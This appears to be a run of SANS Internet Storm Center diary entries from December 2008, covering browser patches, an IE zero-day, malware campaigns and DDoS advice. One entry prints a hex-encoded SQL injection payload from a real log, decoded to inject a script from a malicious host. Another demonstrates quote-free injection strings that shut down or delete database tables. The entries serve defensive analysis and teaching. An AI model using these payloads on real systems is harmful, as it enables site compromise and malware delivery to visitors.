11. Make sure the user grasps the concept that warnings are to be read and understood, not clicked on to get to what they wanted to do. Such ignored warnings can cost them a lot.
12. Teach them internet safety.  I created a cheat sheet for my 80+ year old aunt.  if she is unsure about something she can check.  The sheet has  (in aunt speak) things on it like  "your bank will never send you an email asking for passwords".  Emails asking for money, or spinning sob stories should be ignored.  etc, you get the idea.   It also has info on how to print, how to use skype, etc.  Pretty much anything I thought would reduce any helpdesk calls (she doesn't always remember that I'm in a differnt time zone.
13. Teach them to ignore the ISP/Bank/Shop/etc  help desk that suggests you should turn the firewall off because that will make their service work. 

So they were the 12 or so hints of Christmas.  If you have some to add let me know and I'll update the diary in the next day or so.

Happy holidays

Mark

The Microsoft Security Bulletin MS08-078 - Critical
Security Update for Internet Explorer (960714) is available now. We covered this issue in several recent diaries.

http://isc.sans.org/diary.html?storyid=5497

http://isc.sans.org/diary.html?storyid=5479

http://isc.sans.org/diary.html?storyid=5458

http://isc.sans.org/diary.html?storyid=5464

http://isc.sans.org/diary.html?storyid=5503
Here is the link to the advisory.
http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
As previously noted this is a critical update for IE 5.0.1, IE 6,
IE 6 SP1, IE 7 and IE 8 Beta 2. It is being exploited in the wild. It is being distributed via SQL injection.

So get your patches asap.

UPDATE

Just in case it wasn't obvious to everyone. ChrisM wrote in and reminded us that:
"The emergency IE patch that came out today (MS08-078), DOES NOT replace the IE security patch that came out earlier this month (MS08-073). Both of these patches have to be installed to make IE "secure"."

Is this browser patch day?
We have a patch coming out for IE today.
http://isc.sans.org/diary.html?storyid=5506
Firefox released an upgrade yesterday that addressed several security issues
http://isc.sans.org/diary.html?storyid=5506
Opera has released a new version to address security issues.
http://www.opera.com/docs/changelogs/windows/963/
Opera 9.63 was just released. It addresses the following security issues.
Manipulating text input contents can allow execution of arbitrary code, as reported by Red XIII.
HTML parsing flaw can cause Opera to execute arbitrary code, as reported by Alexios Fakos.
Long hostnames in file: URLs can cause execution of arbitrary code, as reported by Vitaly McLain.
Script injection in feed preview can reveal contents of unrelated news feeds, as reported by David Bloom.
Built-in XSLT templates can allow cross-site scripting, as reported by Robert Swiecki of the Google Security Team.
Fixed an issue that could reveal random data, as reported by Matthew of Hispasec Sistemas.
SVG images embedded using <img> tags can no longer execute Java or plugin content, suggested by Chris Evans.

Team Cymru has a new look-up service that launched recently.
The Malware Hash Registry (MHR) service allows you to
query their database of many millions of unique malware samples
for a computed MD5 or SHA-1 hash of a file. If it is malware
and they know about, they return the last time they have seen
it along with an approximate anti-virus detection percentage.

THERE IS NO COST FOR NON-COMMERCIAL USE OF THIS TOOL. ACCESS IS
PUBLICLY AVAILABLE TO ANYONE.

Upon submission of a malware hash, the output of the command will return
a date the sample was first seen as well as the detection rate they've
seen using up to 30 AV packages. The detection rate is based on the
first time they scanned the sample.

Queries, including reasonable bulk queries, may be made using the
command line only.

The MHR compliments an anti-virus (AV) strategy by helping to identify
unknown or suspicious files that they have already identified as
malicious. This enables you to take action earlier than you would
otherwise be able to.


Full details including command syntax and procedures can be found at
<http://www.team-cymru.org/Services/MHR/>.

This is one of several new (free) data sets and services they are
currently providing to the community; if you haven't visited their
(recently revamped) site recently please do so for details of the
extensive work they do for the security community as well as further
advice, data and tips to help you make your networks more secure:
<http://www.team-cymru.org/Services>

If you want to use this as an IDS like tool Seth Hall from osu.edu
released this bro script into the public.
http://github.com/sethhall/bro_scripts/tree/e9bdb2f6afce6c809e3434de33723639d3d43ca3/md5_hash_malware/http-cymru-malware-hash.bro

If you need to know which virus is being detected, you could use a
service like virustotal with an md5 hash lookup. Just go to this url
http://www.virustotal.com/buscaHash.html and enter the checksum
(md5,sha1 or sha256) into the search bar.

Virustotal.com and cymru.com are not related. So they won't have
all the same hashes. But there should be pretty good cross service hash matching.

UPDATE

Seth Hall wrote in and advised us that he has put a short wiki up about installing the necessary support for using his changes. http://github.com/sethhall/bro_scripts/wikis/the-malware-hash-registry-and-bro-ids

FireFox 3.0.5 has been released with several security fixes.

Fixed in Firefox 3.0.5
MFSA 2008-69 XSS vulnerabilities in SessionStore
MFSA 2008-68 XSS and JavaScript privilege escalation
MFSA 2008-67 Escaped null characters ignored by CSS parser
MFSA 2008-66 Errors parsing URLs with leading whitespace and control characters
MFSA 2008-65 Cross-domain data theft via script redirect error message
MFSA 2008-64 XMLHttpRequest 302 response disclosure
MFSA 2008-63 User tracking via XUL persist attribute
MFSA 2008-60 Crashes with evidence of memory corruption (rv:1.9.0.5/1.8.1.19)

Thanks to John and Roseman for bringing this to our attention.

J.T. wrote in to tell us there is an issue with the XML Data Island CLSID workaround for the zero day IE vulnerability.

"If the Disable XML Island functionality work around is used, users are
no longer able to send emails with Exchange 2003 Outlook Web Access.
When the user clicks the send button to send the message, the following
alert is displayed: "You do not have permissions to delete this item".
If the user clicks "OK" on the prompt window, the message window is
closed and the message is not sent.
When XML island functionality is re-enabled, the message is delivered as
expected."

I assume this implies that outlook webmail requires embedded xml in
html as Microsoft did list this as an impact.

http://www.microsoft.com/technet/security/advisory/961051.mspx
"Impact of workaround: Embedded XML in HTML may not render correctly."
 
 

Cisco released their 2008 Annual Security report.
http://cisco.com/en/US/prod/vpndevc/annual_security_report.html
It is a good report highlighting security threats and trends.
This is fairly comprehensive. Its 52 pages in length and very well done.
They have chapter on Security Risks and trends, data loss, Human Factors,
Insider Threats, Issues of trust, vulnerabilities, Geopolitical and
political conflicts, Countering Internet Security Threats and a
Conclusion chapter.
Of course they couldn't cover everything but for a good review
of the kinds of things that happened in the last year from an
Internet based perspective this is a very good report to read.

Microsoft has announced that they will be releasing an out of cycle
security bulletin  tomorrow for the IE zero day discussed here.
http://isc.sans.org/diary.html?storyid=5470
Here is the link to the announcement.
http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
It has good version information that should help IT departments plan
for this patch deployment.

From XXSed (http://www.xssed.com/news/80/New_highly_critical_Facebook_XSS_vulnerabilities_pose_serious_privacy_risks/) -

"Security researchers Zeitjak, David Wharton, Daimon and p3lo, have recently discovered XSS flaws that affect several Facebook functionalities including the developers page, new users registration page, iphone login page and applications page."

PoC links are on XXSed for anyone who is curious.

We've gotten reports that the W32.Delezium (from Symantec)/Impair.A (from Sophos) virus is floating around and being a general pain in the neck. The detection from Symantec (as "W32.Delezium/inf") only catches infected files, not the virus itself.

The Symantec report is more detailed than the Sophos report, there are some contradictions between the two on how the virus is spreading. The virus is a standard file infector but will also insert a registry entry to enable it to run every startup.

From the Symantec report-

"Next, the virus searches all local, removable and network drives for files with the following extensions, which it subsequently deletes:

• .3dx
• .3gp
• .app
• .as
• .asp
• .aspx
• .avi
• .cad
• .css
• .doc
• .fla
• .frm
• .gif
• .jar
• .java
• .jpg
• .jsp
• .mdb
• .mp3
• .mpg
• .pdf
• .ppt
• .psd
• .rar
• .sis
• .vb
• .wmv
• .xls
• .zip

The virus then searches all removable drives for .exe files, which it then infects."

Apple's released an update for OSX, you can now download 10.5.6 through the Software Update app.

It patches a large number of vulns, here are just the CVEs:

• CVE-2008-4236 - Apple Type Services malicious PDF font DoS
• CVE-2008-4217 - BOM CPIO archive code execution
• CVE-2008-3623 - CoreGraphics heap overflow via malicious image
• CVE-2008-3170 - CoreServices/Safari user credential disclosure
• CVE-2008-4234 - CoreTypes failure of Download Validation (no warning when you launch downloaded content)
• CVE-2008-4818 - Flash Player plug-in issues (as per previous entries earlier in the summer)
• CVE-2008-4819 - Flash Player plug-in issues
• CVE-2008-4820 - Flash Player plug-in issues
• CVE-2008-4821 - Flash Player plug-in issues
• CVE-2008-4822 - Flash Player plug-in issues
• CVE-2008-4823 - Flash Player plug-in issues
• CVE-2008-4824 - Flash Player plug-in issues
• CVE-2008-4218 - Kernel integer overflow allowing local priv escalation
• CVE-2008-4219 - Kernel - system crash when you use dynamic libraries on an NFS share
• CVE-2008-4220 - Libsystem integer overflow in the inet_net_pton API (gives code execution)
• CVE-2008-4221 - Libsystem "memory corruption" via the strptime API (gives code execution)
• CVE-2008-1391 - Libsystem - a whole pile of integer overflows in  the strfmon API (gives code execution)
• CVE-2008-4237 - Managed Client doesn't apply managed screen saver settings correctly
• CVE-2008-4222 - network_cmds - DoS via custom TCP packet when Internet Sharing is enabled
• CVE-2008-4223 - Podcast Producer auth bypass allows a remote attacker access to the admin functions
• CVE-2008-4224 - UDF - a specially built ISO file can cause a system crash.

You can get the update via Software Update or from: http://www.apple.com/support/downloads/

The hashes are as follows:

For Mac OS X v10.5.5
The download file is named: "MacOSXUpd10.5.6.dmg"
Its SHA-1 digest is: 684f67524a92b4314a4bdd52498fb3b6af8f9ded

For Mac OS X v10.5 - v10.5.4
The download file is named: "MacOSXUpdCombo10.5.6.dmg"
Its SHA-1 digest is: 09de4ac2c5591ab75d51ef37dc70f9e5630150d4

For Mac OS X Server v10.5.5
The download file is named: "MacOSXServerUpd10.5.6.dmg"
Its SHA-1 digest is: bd14ab94b9bcc896da1613ac761171b54286bcac

For Mac OS X Server v10.5 - v10.5.4
The download file is named: "MacOSXServerUpdCombo10.5.6.dmg"
Its SHA-1 digest is: e20d8d458be3ec51b0083ff823ce27def00dbca7

For Mac OS X v10.4.11 (Intel)
The download file is named: "SecUpd2008-008Intel.dmg"
Its SHA-1 digest is: 651e592fad1bd158a76459a81d2ebede1f3bedea

For Mac OS X v10.4.11 (PowerPC)
The download file is named: "SecUpd2008-008PPC.dmg"
Its SHA-1 digest is: 9bb2aa7fcc924715b6442e808fc778789f359906

For Mac OS X Server v10.4.11 (Universal)
The download file is named: "SecUpdSrvr2008-008Univ.dmg"
Its SHA-1 digest is: 21702064037150cdeb9d708304ee91eb254c7371

For Mac OS X Server v10.4.11 (PowerPC)
The download file is named: "SecUpdSrvr2008-008PPC.dmg"
Its SHA-1 digest is: d0e4720051ea27b8edf0ab2a124d6e9f0e16534c

We'll be updating as we have any additional information about the update

A slightly belated entry to make sure everyone is aware that last week we saw a new vulnerability announced for MS SQL Server 2000, 2005 & 2005 Express Edition by Bernhard Mueller from SEC Consult. Here is the original announcement: http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

The above link does include a simple test script (not a full PoC) for the vulnerability.

There is a mitigation available - you can remove the vulnerable stored procedure. Microsoft hasn't provided a patch yet and hasn't provided a timeframe for delivery either.

I asked our readers for some input during my last shift and only got 2 responses, so there wasn't much to followup on, though see the additional links below, re: finding threads/executables (thanx to Michael and Francesco for pointing these out).  I am still interested in the IPv6 tools question, so I plan to spend some time over the next month testing some of our favorite network tools in an IPv6 environment and hope to post some of my results during my next shift in Jan.  If there are any tools that you like that you'd like to recommend for me to look at, let me know via our contact page in the next couple of days.

Additional reading material:

http://dvlabs.tippingpoint.com/blog/2008/11/06/mindshare-finding-executable-images-in-windbg  (by Cody Pierce)

http://www.dfrws.org/2006/proceedings/2-Schuster.pdf  (paper by Andreas Schuster)

Another tool:

http://www.nirsoft.net/utils/injected_dll.html

For those who have been following the recent exploitation of the unpatched Internet Explorer vulnerability, Microsoft updated their security advisory 961051, yet again yesterday.  They provided some clarification of the workaround suggestions.  I highly recommend you read thier blog post here.

I've been having a lot of fun and quite some additional insight into what makes one browser different from the next one reading today the Google browser security handbook by Michal Zalewski

I've not yet touched on the testing toolkit they have available for download, but the 3 sections of the document are quite interesting.

Highly recommended reading!

--
Swa Frantzen -- Section 66

Hey everyone, sorry it has taken so long to get around to recording another podcast episode.  Travel schedules have been very crazy between us lately.  Anyway, enough excuses, here is episode twelve. 

All the podcasts

Just this podcast

Podcast through iTunes

-- Joel Esler http://www.joelesler.net

Microsoft has updated Security Advisory (961051) to include Microsoft Internet Explorer 6 and Windows Internet Explorer 8(beta).

This is the vulnerability discussed is these recent articles:

http://isc.sans.org/diary.html?storyid=5458

and

http://isc.sans.org/diary.html?storyid=5464

I don't want to start a panic.  We have not received any reports of attacks affecting these versions (yet.)

A reader sent us a suspicious e-mail, which included a link to an .xpi file (a Firefox extension) as attachement. Looks like a very nice find! I am still looking at the extension. Just from a preliminary glanze at it, the extension may try to steal the content of form fields.

The origin appears to be russian. The link went to ht tp : //qs-s.  nm.  ru (again: inserted spaces to protect the innocent)

The e-mail:

Subject
We have received mnoey. Here your book. Read and grow rich!
Body
ht tp:// qs-s. nm. ru - We have received money. Here your book. Read adn grow rich!

(and thanks for the person posting the comment below to point out I forgot to break up the second instance of the URL :-) ).

 Still working on exactly figuring out what this does. E.g. if it is just adware or actually steels passwords. May have to wait until I get home and get to run it in the lab.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploit, the script will load another script which will load another script ultimatley leading to the IE exploit.

Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861722832353529204445434C415245205461626C655F437572736F7220435552534F52
20464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
6A6563747320612C737973636F6C756D6E7306220776865726520612E69643D622E69642
0616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E45585420465
24F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404
046455443485F5354415455533D302920424547494E20657865632827757064617465205
B272B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287
66172636861722834303030292C5B272B40432B275D29292B27273C73637269707420737
2633D687474703A2F2F313767616D6F2E636F6D2F312E6A733E3C2F7363726970743E272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4
F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--

Decoded as:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                      b.xtype=231 or b.xtype=167)


OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

In addition to the IE issue reported, Juha-Matti (thanks) pointed us to the blog entry at the MSRC which points to the following issue.  http://www.microsoft.com/technet/security/advisory/960906.mspx

This issue affects the wordpad text converter for word 97 on a number of operating systems.  XP SP3, Vista and Server 2008 are not vulnerable. 

Microsoft is investigating some targeted attacks.  If you have captures of samples relating to this let us know.

This issue is NOT addressed by any of the December patches.

Mark H - Shearwater

As reported by some other researchers, there is a 0-day exploit for Internet Explorer circulating in the wild. At this point in time it does not appear to be wildly used, but as the code is publicly available we can expect that this will happen very soon.

This is a brand new exploit that is *not* patched with MS08-073 that was released yesterday. I can confirm that the exploit works in a fully patched Windows XP machine.

The exploit is a typical heap overflow that appears to be exploiting something in the XML parser. After setting up the heap (spraying it – allocating 159 arrays containing the shell code) the exploit checks if couple of things are satisfied before continuing:

• The user has to be running Internet Explorer
• The version of Internet Explorer has to be 7
• The operating system has to be Windows XP or Windows 2003

If these things are satisfied, the exploit creates an XML tag as shown above. What is also interesting, and can be seen in the code above is that it waits 6 seconds before executing the code – this was probably added to thwart automatic crawlers by anti-virus vendors.

We have not confirmed yet if other versions are affected (Internet Explorer 6 or Internet Explorer 7 on Microsoft Windows Vista).

How to mitigate? This is a difficult question as we have not analyzed this completely yet. If you use an alternative browser you are not affected. When we get more information we will update the diary.

--
Bojan

Our reader Roseman, dropped us an e-mail (which eventually arrived):

From US-CERT:
"The PHP Group has released PHP version 5.2.8 to address a vulnerability in the magic_quotes functionality. This vulnerability was introduced in PHP version 5.2.7. In addition to correcting this regression, PHP version 5.2.8 addresses a number of vulnerabilities that were originally addressed by version 5.2.7.

US-CERT encourages users to upgrade to PHP 5.2.8 or implement the workaround as described in the PHP 5.2.8 Release Announcement."

From PHP:
"PHP 5.2.8 Release Announcement

The PHP development team would like to announce the immediate availability of PHP 5.2.8. This release addresses a regression introduced by 5.2.7 in regard to the magic_quotes functionality, that was broken by an incorrect fix to the filter extension. All users who have upgraded to 5.2.7 are encouraged to upgrade to this release, alternatively you can apply a work-around for the bug by changing "filter.default_flags=0" in php.ini

For users upgrading from PHP 5.0 and PHP 5.1, an upgrade guide is available here, detailing the changes between those releases and PHP 5.2.8.

For a full list of changes in PHP 5.2.8, see the ChangeLog."
 

More details here :

http://www.php.net/releases/5_2_8.php
http://www.php.net/ChangeLog-5.php#5.2.8
http://bugs.php.net/bug.php?id=42718

Just a quick note that the SANS NOC is actively working on a server outage that appears to have a critical role in getting both email and web input to the handlers (who are spread out around the world as some of you might know).

So we're having an unusually quiet day -for a Black Tuesday it's extremely quiet- (did I just say the q word twice?  ). It might take a bit before we can get back to you once the service is restored. So please be patient.

It might be a very good time to remind all of the URL of our alternate "emergency" website network: http://iscems.sans.org/ best to bookmark it should our web servers one day be unavailable for some reason.

Update : Mail routing is back, and we've been monitoring it not for a few hours. If you've not had a response from us, we appologise! If you've request a password reset e-mail, then you'll likely need to request another as they time out.

--
Swa Frantzen -- Section 66

Overview of the December 2008 Microsoft patches and their status.

--
Swa Frantzen -- Section 66

Ed Skoudis (you may have heard of him?) wrote me today to let me know that he has produced a new Hacking Challenge for everyone to enjoy, it's a more pen-test oriented challenge.:

http://www.ethicalhacker.net/content/view/218/1/

Now, Ed wants to be clear that he doesn't make any money from these or anything: "I write them so that people can have fun with them and develop their skills in a safe way." -- Ed Skoudis

Have Fun!!

-- Joel Esler http://www.joelesler.net

Everyday we receive about 20 reports of "www.xwebsitehere.com" being slow.  Today we've received a few reports about Google being slow.  One reader (thanks Neal) even wrote in to say that after he did some monitoring on his connections, he isolated it down to "pagead2.googlesyndication.com".  Obviously, from the hostname being one of the servers that serves ads to lots of websites. 

Neal stated that after he blocklisted this hostname, his browsing went back to normal.  Anyone else experiencing similar?

(Yes we have received several reports of Google being slow, I'm asking if you can replicate the "pagead2" issue.)

-- Joel Esler http://www.joelesler.net

When Brad went to a web site in search of fluffy clothing for his toddler, little did he know that each web page of that baby site was booby trapped. The bottom of each page contained an obfuscated section framed by comments that claimed that the javascript code was for "Yahoo Counter".  Well, it wasn't.

What it did was download a heavily obfuscated Javascript, followed by a download of a PDF with embedded exploit code, followed by a download of an EXE. The EXE has almost no detection (Virustotal) at this time.

The analysis of this case was made a tiny bit more interesting than usual .. because the self defense mechanisms of the obfuscated JavaScript code were pretty good. Whoever wrote this thing probably read my ISC diary on how to patch SpiderMonkey to even untangle obnoxious Javascript. Because when I simply ran the code through my patched Spidermonkey, what I got was:

daniel@debian:~$ js i.js
File i.js Line 68 calls eval with the following parameter:
//Just f**k off...

The ** have been added, of course. Eventually, this protection fell as well though. If you want to make sure your users haven't been "had" likewise while shopping for baby clothes, check your logs for connections to 218.93.202. 61 and 78.110.175. 21 . Don't go there though, both sites are BAD.

We received a couple of submissions from ISC readers that indicate that a new wave of rogue "Flash Player" updates is making the rounds. This latest version is pretty artfully done - the pages hosting this malware actually do contain a real flash movie that is not malicious and plays in a Youtube-like embedded frame. After the movie has been running for a couple seconds though, a pop-up opens that indicates that a "Flash Player Update is available". It all looks credibly enough like one of those usual auto-update pop-ups, but if you click OK, you get an EXE which isn't really a Flash player update of course.

So far, the URLs where the malware is coming from all seem to have in common that port 7777 is used. This is rare enough that trolling through your proxy logs for any of your users going to a URL containing :7777/dt might give you a better indication than your anti-virus. Because AV coverage (VirusTotal) is only slowly improving.

Fellow researchers from Symantec posted technical details about an interesting variant of a well known DNSChanger malware. The analysis is available at http://www.symantec.com/security_response/writeup.jsp?docid=2008-120318-5914-99&tabid=1

The DNSChanger malware has been in the wild for quite some time and already drew our attention previously when authors started attacking popular ADSL modems. As the name says, the malware changed DNS server settings, typically to servers in the "popular" 85.255 network. We published several diaries about this malware, the most recent one from Andre is available at http://isc.sans.org/diary.html?storyid=5390.

The evolution went from changing local DNS servers in the operating system (for both Windows and Mac!) to changing DNS server settings in ADSL modems/routers/cable modems.

The malware described by Symantec goes a step further – it installs a rogue DHCP server on the network. Besides the post by Symantec, we also got notified of this malware two days ago by our reader Tim, so we can confirm that this malware is in the wild.

What does it do? The malware installs a legitimate driver, NDISProt which allows it to send and receive raw Ethernet frames. Once the driver is installed, the malware "simulates" a DHCP server. It starts monitoring network traffic and when it sees a DHCP discover packet it replies with its own DHCP Offer packet. As you can guess, the offered DHCP lease will contain malicious DNS servers, as shown below:



While not too sophisticated, the whole attack is very interesting. First, it's about a race between the rogue DHCP server and the legitimate one. Second, once a machine has been poisoned it is impossible to detect how it actually got poisoned in the first place – you will have to analyze network traffic to see the MAC address of those DHCP Offer packets to find out where the infected machine actually is.

As we wrote numerous times before, it's probably wise to at least monitor traffic to 85.255.112.0 – 85.255.127.255, if not block it.

--
Bojan
 

We got notified by couple of readers that Finjan's appliance started blocking access to isc.sans.org due to detected malicious behavior, whichi s a false positive. The URL analysis tool on the Finjan's web site confirms that this is indeed happening.

We notified Finjan and this should be fixed as soon as possible. In the mean time, you can put isc.sans.org on the white list so you can continue visiting us.

--
Bojan
 

Well it was about time we got around to updating the ISC Poll.  I came up with the current poll after reading Lenny's great diary post on "Tips to responding to a DDoS attack".  So that being said please do participate in the poll, the results should prove to be interesting in quantifying how many organizations suffer from these sorts of attacks.

Some other interesting reports/statistics on Denial of Service attacks can be found at the links below. (feel free to submit other links at https://isc.sans.org/contact.html )

Arbor networks blog post (to see the full report it may require divulging your email to a sales guy)

http://asert.arbornetworks.com/2008/11/2008-worldwide-infrastructure-security-report/

http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.DDos

http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.DDoSHistorical

VMWare have today released a security advisory, and updated another.

- VMSA-2008-0019 (new advisory)

http://lists.vmware.com/pipermail/security-announce/2008/000046.html

This impacts :

• VMware Workstation 6.0.5 and earlier
• VMware Workstation 5.5.8 and earlier
• VMware Player 2.0.5 and earlier
• VMware Player 1.0.8 and earlier
• VMware Server 1.0.9 and earlier
• VMware ESX(i) 3.5 and 3.0.2

- VMSA-2008-0017.2 (updated advisory)

http://lists.vmware.com/pipermail/security-announce/2008/000047.html

VMWare have added ESX 3.5 patch information after release of patches on 2nd Decemeber 2008.

Our carbon based RSS news reader known as Roseman has alerted us to the availability of a new Java release. Sun Java 6.0 Update 11 is now available!

The release notes are available for you enjoyment, and Sun describe the release as "This release contains fixes for one or more security vulnerabilities."

Roseman also suggests that you check the settings in the "Java Control Panel" just in case the settings you have chosen have been reset by the release.

Thanks to the other readers who submitted the news of the update too!

Details are still sketchy as to the cause of a failure overnight of the Sonicwall License Manager Server.  We are receiving reports from Sonicwall users that the server "reset" (meaning invalidated) the licenses on all of their email security products. The customers are reporting that this is causing them to be unable to login to their own systems.  It is reported that the support calls are not being answered and are going straight to voicemail. 

It appears that Sonic Wall users received an email overnight indicating that the Email Security licenses have been reset and says that the filtering will not be working.  The email recommended that the customer contact Tech Support (which could be why the calls are going straight to voicemail).

One of our readers who is also a Sonic Wall customer sent us this information from correspondence with Sonic Wall : "The issue is on our backend server who stores the registrations, some ES appliances got licences resetted. The exact cause is still being analized with high priority. In those cases entering the mysonicwall credentials or uploading file solve the issue. Kind Regards Ivan"

So if you are a Sonic Wall customer and you haven't discovered it yet, you may very well have reduced protection. If the firewalls cannot login and verify licensing, the subscription services (content filtering, intrusion prevention, gateway AV) stop working.

Derek, one of our readers and a Sonic Wall customer using the Sonic Wall content filtering has verified that he is now able to access sites that should be getting blocked. Which means schools, businesses, etc that are counting on Sonic Wall to filter for them are sorely disappointed today.

We will update you if anything else pops up on this.

While teaching the defensive web app security classes with SANS, I often hear "I have been filtering/escaping quote character for years to prevent SQL injection, it had worked flawlessly." That's one of the common statement I get when I sell the idea of parameterized queries. We know by now that filtering single quote does not prevent all SQL injection, but how big is the risk?

I have been doing some SQL injection research with the fine folks from Security Compass on MS SQL server. Depending on your setup, you might be more vulnerable than you think. What characters do people normally filter or escape for preventing SQL injection?  Maybe quote and semi-colon?  Bad news, depending on your setup, you maybe very vulnerable even after filtering those characters.

Semicolon Not needed

Let's get some background information first. MS SQL server support query piggybacking by default, so you can execute multiple SQL statements in one single communication with the SQL server. While it is widely believed that you need a semi-colon between different logical statement while piggybacking, it is really not necessary.

Here is an example,

select * from product; select * from employee

But actually, the following version without semi-colon works too

select * from product  select * from employee

Or  even this

select 1 select 2

No semi-colon is required to delimit each statement. With Microsoft documentation, I have found that up to MS SQL 2008, semi-colon is not necessary but this will change in future version of MS SQL server

So, filtering semi-colon may not provide the protection you wanted.

Quote Not needed

Now, what about quote? This one is easy and is well publicized by other researchers such as "Advanced SQL Injection" paper by Chris Anley (back in 2002).

You simply do not need quote to SQL inject a numeric type of input, because quotes are not used for numeric type in SQL statement.

Let's look at an example of a textbook SQL injection vulnerability, assuming qty is a numeric type in the database

select * from product where qty = <USER INPUT>

An attacker can simply put in 1 or 1 = 1 and return all data. Quotes needed? Nope.

To leverage both techniques mentioned about, what an attacker might be able to do is

select * from product where qty = 1 shutdown

An instant DoS attack with the DB server shutdown, if the web app user is running as "sa".

select * from product where qty = 1 delete from product where qty = 1

Did I use quote? No....  Did I use semi-colon? No...

For some of the advanced reader, you must be saying, "Hey! There are tons more evil attacks possible with this" Sure, but ISC isn't trying to teach you how to hack (SANS has 538 and 542 on how to pentest web apps). The basics that everyone need to understand is - if you can run a full SQL statement, the possible damage is a lot higher. An attacker does not always need quote and semi-colon to run a separate SQL statement.

Now, the best fix for SQL injection is still parameterizing your SQL queries. If you still want to filter SQL characters or keyword, that's up to you, but remember that there's a good chance you will get hacked.
 

------------------------------------------
Jason Lam, author of SANS web app courses - 319, 422, 538

At SANS Internet Storm Center, we are always researching and monitoring the latest trends of attacks on the Internet. We are currently developing a web honeypot project similar to the Dshield model. The launch time is a few months away and the project is in need of volunteer researchers to help get thru the beta phase.

Here are the technical skillsets we need

• PHP coding
• SQL
• Apache
• Understanding of HTTP
• IIS
• Technical writing (documentation)
• Experience with various Opensource web applications

We expect each volunteer to put in about 70 total hours in the next 3 months. Each volunteer should have at least 3-4 skills from the above list to be effective in the project. If you think you can contribute to this project, please send us an Email at isc@sans.org with "Web Honeypot volunteer" as subject line. Please include one short paragraph about your background and skillset.

UPDATE - Dec 4th: Thanks for all the volunteers who signed up. We have enough volunteers to get this project going for the moment. It is likely that we will recruit more volunteers in a few months. Stay tuned if you are interested.

The incident handling cheat sheets in an earlier diary applied to many types of security incidents. Some situations, such as distributed denial-of-service (DDoS) attacks, benefit from specialized guidelines. After soliciting tips from our readers and fellow ISC handlers, I compiled the following cheat sheet to help organizations during a DDoS attack.

The cheat sheet captures advice for battling a network DDoS attack on your infrastructure. The link points to the HTML version of the cheat sheet. That page includes the printable 1-page PDF version, and the Word version of the file you can customize for your needs.

What do you think? Any corrections or additions? Pointers to useful resources? Let us know.

Thanks for the insights to our readers and ISC handlers, including: Daniel Fairchild, Chris Lemieux, Peter McLaughlin, Jose Nazario, Donald Smith, and Jim Tuttle.

Additional feedback from our readers:

Adam Jarvela wrote: "From the datacenter perspective it's important to identify the specific destination of the attack... .  I'm a fan of the old method of starting at the core and following the traffic to the aggregate and eventually to the distributor.  From the distributor it's usually pretty easy to identify the destination of the attack..." "Recently, we had a very odd attack on ip protocol 255. Not the first time we've seen this, but by being able to identify the specific attack you can create an attack specific filter instead of blackholing the entire server/IP/subnet..."

Andrew wrote a shell script that, when ran on the DDoS'ed Linux web server "would terminate connections exceeding a set value (10 in this example) from the same source IP. Although not ideal, however does hopefully prevent the web server from falling over (exceeding sockets thresholds) whilst one is assessing the DDoS situation." Here's Andrew's script:

#!/bin/sh
PATH=$PATH

while true; do
sleep 60

UNIQ=`netstat -tpn | grep -i established | awk '{print $5}' | cut -d':' -f1 | uniq`

for IP in $UNIQ; do
WC=`netstat -tpn | grep $IP | wc -l`
if [ ${WC} -gt "10" ]; then
PID=`netstat -tpn | grep $IP | awk '{print $7}' | cut -d'/' -f1 | sort -n`
KILL=`echo $PID | cut -d' ' -f10-`
kill -s 9 $KILL
logger -sp daemon.notice -t Web_Server "Established threshhold exceeded for IP ${IP} and PID ${KILL}"
fi
done
done

 

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.